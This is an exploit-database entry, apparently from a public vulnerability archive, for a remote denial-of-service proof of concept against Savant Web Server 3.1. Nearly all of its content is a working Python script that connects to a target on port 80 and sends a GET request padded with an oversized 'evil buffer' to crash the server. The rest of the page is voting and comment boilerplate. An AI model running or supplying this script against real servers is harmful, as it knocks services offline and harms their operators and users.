Savant Web Server 3.1 Denial of-Service (PoC)

2020.06.16
Credit: Anon
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/usr/bin/python import socket import sys from struct import pack try: server = sys.argv[1] port = 80 size = 260 httpMethod = b"GET /" inputBuffer = b"\x41" * size httpEndRequest = b"\r\n\r\n" buf = httpMethod + inputBuffer + httpEndRequest print("Sending evil buffer...") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((server, port)) s.send(buf) s.close() print("Done!") except socket.error: print("Could not connect!")


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top